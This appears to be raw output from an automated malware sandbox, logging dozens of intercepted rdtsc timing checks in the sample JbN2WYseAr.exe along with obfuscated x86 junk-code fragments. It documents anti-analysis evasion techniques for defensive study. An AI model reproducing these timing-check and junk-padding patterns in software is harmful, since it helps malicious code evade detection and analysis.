Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0CAE second address: 71D0CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 1CEFDCDCh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F953D01523Ch 0x00000014 mov ax, 9AD1h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0D23 second address: 71D0D9D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F953D46EDA0h 0x00000008 add ecx, 767B3518h 0x0000000e jmp 00007F953D46ED9Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test edi, edi 0x00000019 pushad 0x0000001a mov ebx, eax 0x0000001c pushfd 0x0000001d jmp 00007F953D46EDA0h 0x00000022 add si, 1F78h 0x00000027 jmp 00007F953D46ED9Bh 0x0000002c popfd 0x0000002d popad 0x0000002e js 00007F95AD77D6DCh 0x00000034 pushad 0x00000035 mov edx, 4EA5B166h 0x0000003a popad 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F953D46EDA8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0D9D second address: 71D0DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 jmp 00007F953D01523Ah 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DC8 second address: 71D0DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DCC second address: 71D0DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0DD2 second address: 71D0E20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F953D46EDA4h 0x00000014 adc eax, 17C5A8F8h 0x0000001a jmp 00007F953D46ED9Bh 0x0000001f popfd 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 mov dword ptr [esp], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F953D46EDA1h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E20 second address: 71D0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d jmp 00007F953D01523Ch 0x00000012 jmp 00007F953D015242h 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a mov di, si 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E67 second address: 71D0E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0E77 second address: 71D0E8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F1C second address: 71D0F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F20 second address: 71D0F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F3D second address: 71D0F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F953D46EDA4h 0x0000000f mov dword ptr [esi+0Ch], eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 mov si, bx 0x00000017 pop ebx 0x00000018 call 00007F953D46EDA6h 0x0000001d mov ah, DEh 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov edx, 775606ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F953D46EDA4h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0F9B second address: 71D0FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0FAA second address: 71D0FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Fh 0x00000009 sub ah, FFFFFF8Eh 0x0000000c jmp 00007F953D46EDA9h 0x00000011 popfd 0x00000012 mov dh, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46ED9Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0FF5 second address: 71D103E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007F953D01523Eh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F953D015247h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D103E second address: 71D10D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA2h 0x00000009 sub ecx, 4AEEE628h 0x0000000f jmp 00007F953D46ED9Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a jmp 00007F953D46EDA6h 0x0000001f jne 00007F95AD77D3F1h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F953D46ED9Eh 0x0000002c add al, FFFFFFB8h 0x0000002f jmp 00007F953D46ED9Bh 0x00000034 popfd 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F953D46EDA6h 0x0000003d jmp 00007F953D46EDA5h 0x00000042 popfd 0x00000043 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10D5 second address: 71D10F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [ebp+08h] 0x0000000a jmp 00007F953D01523Ah 0x0000000f mov eax, dword ptr [esi] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10F1 second address: 71D10F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D10F5 second address: 71D1112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1112 second address: 71D1200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov al, dl 0x0000000f pop ecx 0x00000010 mov bx, 3D38h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 jmp 00007F953D46EDA7h 0x0000001d mov dword ptr [edx+04h], eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F953D46EDA4h 0x00000027 add ch, FFFFFFC8h 0x0000002a jmp 00007F953D46ED9Bh 0x0000002f popfd 0x00000030 jmp 00007F953D46EDA8h 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+08h] 0x00000039 pushad 0x0000003a call 00007F953D46ED9Eh 0x0000003f mov dx, ax 0x00000042 pop ecx 0x00000043 push edi 0x00000044 push esi 0x00000045 pop edx 0x00000046 pop eax 0x00000047 popad 0x00000048 mov dword ptr [edx+08h], eax 0x0000004b pushad 0x0000004c jmp 00007F953D46ED9Bh 0x00000051 jmp 00007F953D46EDA8h 0x00000056 popad 0x00000057 mov eax, dword ptr [esi+0Ch] 0x0000005a jmp 00007F953D46EDA0h 0x0000005f mov dword ptr [edx+0Ch], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F953D46EDA7h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1200 second address: 71D1218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1218 second address: 71D121C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D121C second address: 71D1244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015249h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1244 second address: 71D1259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1259 second address: 71D128D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D015248h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D128D second address: 71D1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1291 second address: 71D1297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1297 second address: 71D12B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46ED9Ch 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+14h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12B4 second address: 71D12BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12BB second address: 71D12E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Eh 0x00000009 and eax, 659F4F58h 0x0000000f jmp 00007F953D46ED9Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D12E1 second address: 71D130B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+14h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, BBh 0x0000000f pushfd 0x00000010 jmp 00007F953D01523Ah 0x00000015 and cl, FFFFFFB8h 0x00000018 jmp 00007F953D01523Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D130B second address: 71D1311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1311 second address: 71D1315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1315 second address: 71D1325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1325 second address: 71D132E instructions: 0x00000000 rdtsc 0x00000002 mov dl, 99h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D132E second address: 71D1383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 16098F73h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e jmp 00007F953D46EDA6h 0x00000013 mov eax, dword ptr [esi+1Ch] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a pushfd 0x0000001b jmp 00007F953D46ED9Ah 0x00000020 jmp 00007F953D46EDA5h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [edx+1Ch], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1383 second address: 71D13BB instructions: 0x00000000 rdtsc 0x00000002 mov si, D225h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, si 0x0000000b popad 0x0000000c mov eax, dword ptr [esi+20h] 0x0000000f pushad 0x00000010 mov esi, 0990EDD9h 0x00000015 mov eax, 30198E95h 0x0000001a popad 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e pushad 0x0000001f push esi 0x00000020 mov ah, bh 0x00000022 pop ecx 0x00000023 mov si, dx 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+24h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F953D01523Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D13BB second address: 71D13C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D13C3 second address: 71D1414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+24h], eax 0x0000000a jmp 00007F953D015246h 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F953D015243h 0x0000001d jmp 00007F953D015243h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1414 second address: 71D1471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F953D46ED9Eh 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 jmp 00007F953D46EDA0h 0x00000019 mov dword ptr [edx+2Ch], ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1471 second address: 71D1498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1498 second address: 71D149E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D149E second address: 71D14D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015247h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D14D1 second address: 71D1506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46EDA2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F953D46EDA7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1506 second address: 71D150C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D150C second address: 71D1510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1510 second address: 71D1514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1514 second address: 71D152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 movsx edx, ax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D152A second address: 71D15D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d mov di, ax 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 mov dword ptr [edx+34h], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F953D015248h 0x0000001e sbb ecx, 0DC246E8h 0x00000024 jmp 00007F953D01523Bh 0x00000029 popfd 0x0000002a mov ch, EEh 0x0000002c popad 0x0000002d test ecx, 00000700h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F953D01523Ch 0x0000003c sub al, 00000048h 0x0000003f jmp 00007F953D01523Bh 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F953D015248h 0x0000004b add eax, 460D1BA8h 0x00000051 jmp 00007F953D01523Bh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D15D3 second address: 71D1646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F95AD77CEBDh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F953D46ED9Ch 0x00000016 add al, 00000038h 0x00000019 jmp 00007F953D46ED9Bh 0x0000001e popfd 0x0000001f mov esi, 724E536Fh 0x00000024 popad 0x00000025 or dword ptr [edx+38h], FFFFFFFFh 0x00000029 pushad 0x0000002a mov edi, esi 0x0000002c pushad 0x0000002d mov esi, 081BBAB9h 0x00000032 push ecx 0x00000033 pop edi 0x00000034 popad 0x00000035 popad 0x00000036 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e mov edx, esi 0x00000040 popad 0x00000041 or dword ptr [edx+40h], FFFFFFFFh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F953D46ED9Bh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1646 second address: 71D164C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D164C second address: 71D1675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46EDA5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D1675 second address: 71D167E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71D167E second address: 71D169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F953D46EDA2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 716002D second address: 716003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D01523Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 716003D second address: 7160041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160041 second address: 71600C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F953D01523Ch 0x0000000f jmp 00007F953D015242h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F953D015241h 0x0000001c jmp 00007F953D01523Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 call 00007F953D015241h 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 mov edx, 38FB65CAh 0x0000003c push ebx 0x0000003d pop edx 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov bl, 09h 0x00000045 jmp 00007F953D01523Eh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71600C7 second address: 71600CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71606F2 second address: 716070F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 716070F second address: 7160715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160715 second address: 7160719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160719 second address: 7160752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F953D46EDA4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F953D46EDA7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160752 second address: 7160757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160757 second address: 716076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ah, bl 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx eax, di 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7160B78 second address: 7160B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B097A second address: 71B0998 instructions: 0x00000000 rdtsc 0x00000002 mov al, 1Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D46EDA1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B0998 second address: 71B099E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
